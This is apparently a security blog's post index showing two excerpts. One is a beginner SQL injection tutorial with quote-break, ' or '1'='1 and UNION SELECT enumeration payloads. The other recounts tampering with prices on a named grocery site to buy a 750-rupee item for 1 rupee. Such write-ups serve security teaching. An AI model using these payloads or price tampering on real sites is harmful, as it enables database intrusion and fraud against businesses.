Posts

Latest

Sql Injection: Starting from Basic

Blocking Apostrophe: Values to Try Find User or Parameter to inject Name Herp Derper #Try to replace prameter with inverted(') or double quote("), Just see where it throws error. Detect Filtering Name Herp 'Derper # trying the name value as Harp 'Derper insted of Herp Derper      Detect Vulnerability Once vulnerablity is detected or where system throws error try to equalize the query Earlier the query was follow: Select * from user where name='$input'; But we have used an inverted comma in our input so here we get an error because of extra comma, so we need to nutrilize it. Now our Input becomes ' or '1'='1 Isadmin 2 - 1 Test for 1 Column Returned Name Herp Derper Isadmin 1 UNION SELECT Null # Test for 2 Columns Returned Name Herp Derper Isadmin 1 UNION SELECT Null , Null # Find Database Names Name Herp Derper Isadmin 1 UNION SELECT Null , table_schema FRO

BrownBag.in Bug's (Parameter Tampering, XSS, Stored-XSS)

Image
During the COVID-19 pandemic their is surge in the online grocery store. So, it intriguied me, So i started searching website that deliver in my zone and guess what! I found BrownBag.in. So i build and account on it and tried to order something on it. You know what happened then, I ordered the product of 750 in just 1 rupees. Now we are going to learn how that happens. In security term it's just know as Parameter tampering: So let's know what is parameter tampering The Web Parameter Tampering attack is based on the manipulation of parameters exchanged between client and server in order to modify application data, such as user credentials and permissions, price and quantity of products, etc. Usually, this information is stored in cookies, hidden form fields, or URL Query Strings, and is used to increase application functionality and control. This attack can be performed by a malicious user who wants to exploit the application for their own benefit, or an attacker who wishe